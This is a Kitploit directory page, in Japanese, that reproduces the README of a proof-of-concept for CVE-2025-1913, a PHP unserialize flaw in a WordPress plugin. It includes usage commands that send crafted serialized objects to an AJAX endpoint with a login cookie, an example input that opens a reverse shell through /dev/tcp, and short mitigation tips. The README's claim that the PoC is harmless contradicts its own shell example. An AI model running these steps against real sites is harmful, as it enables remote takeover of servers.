Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-1913-PoC — A PoC demonstrating CVE-2025-1913, showing how the plugin’s unsafe unserialize handling can lead to high-impact behavior in controlled environments. Contains a harmful payload for authorized testing only. Use strictly in isolated labs and for defensive research. | Kitploit
ツール/GitHubGitHub/s0haib518-ksa/cve-2025-1913-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubs0haib518-ksa/cve-2025-1913-poc

CVE-2025-1913-PoC

A PoC demonstrating CVE-2025-1913, showing how the plugin’s unsafe unserialize handling can lead to high-impact behavior in controlled environments. Contains a harmful payload for authorized testing only. Use strictly in isolated labs and for defensive research.

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
27ヶ月前未レビュー

CVE-2025-1913 -- Proof of Concept (PoC)

このリポジトリは、教育目的のみ の CVE-2025-1913 の Proof of Concept (PoC) で、Suhaib518 🇸🇦 によって作成されました。 この PoC は、特別に細工されたシリアル化された PHP 入力が、影響を受ける WordPress コンポーネントの脆弱なロジックをどのようにトリガーするかを示しています。 PoC は安全であり、悪意のあるペイロードは含まれていません。

⚠️ 免責事項: この PoC は学習、研究、および防御的なセキュリティテストのみを目的としています。 自分が所有していない、または明示的な許可を得ていないサーバーでは使用しないでください。


📌 概要

この脆弱性は、特定の WordPress プラグインのワークフローにおける PHP シリアル化データの安全でない処理に起因します。 この PoC は、攻撃者が意図しない内部動作を引き起こすように細工されたシリアル化構造を提供する方法を示しています。

このリポジトリには以下の Python スクリプトが含まれています:

  • カスタムシリアル化 PHP オブジェクトの構築
  • WordPress AJAX ベースのエクスポートエンドポイント用のエンコード
  • 安全に問題を示すための制御されたリクエストの送信

📂 リポジトリ内のファイル

root@kitploit:~
.
├── CVE-2025-1913-PoC.py         # Suhaib518 KSA によって作成された PoC スクリプト
└── README.md                    # ドキュメント

🚀 使用方法

1. 必要なもののインストール

このスクリプトは、requests を除いて、組み込みの Python モジュールのみを使用します:

root@kitploit:~
pip install requests

2. 対話型エクスプロイトスクリプトの実行

root@kitploit:~
python3 exploit.py \
  -c "Class" \
  -H "https://target.com" \
  --wp-nonce "1234567890" \
  --cookie "wordpress_logged_in=YOUR_COOKIE_HERE"

以下の入力を求められます:

  • 含めるプロパティの数
  • 各プロパティの名前/値

スクリプトはそれらをシリアル化し、WordPress リクエストを構築して送信します。


✔️ コマンド例 (エクスプロイト成功の流れ)

以下は、使用例を示すコマンド例です(これらは悪意のあるものではなく、プロセスを示すだけです):

root@kitploit:~
python3 exploit.py   -c "WP_User_Query"   -H "https://example.com"   --wp-nonce "89f1a2b3c4"   --cookie "wordpress_logged_in_abc123=abcd1234efgh5678"

対話型質問への回答例:

root@kitploit:~
[?] How many properties does this class have? 2
[?] Name of property #1: file
[?] Value for 'file': shell.sh
[?] Name of property #2: shell
[?] Value for 'shell': sh -i >& /dev/tcp/IP/PORT 0>&1

スクリプトは次のように出力します:

root@kitploit:~
[*] Sending request…
....Check the listener for the shell.

🛡️ 緩和策 (高レベル)

  • 信頼できない入力に対して unserialize() を使用しない
  • すべてのフォームパラメータと AJAX リクエストを検証する
  • プラグインを最新の状態に保つ
  • PHP シリアル化の代わりに JSON などの最新のデータ形式を使用する

📜 ライセンス

MIT License.


🙌 作成者

Suhaib518 🇸🇦 によって作成されました。

ツールをダウンロード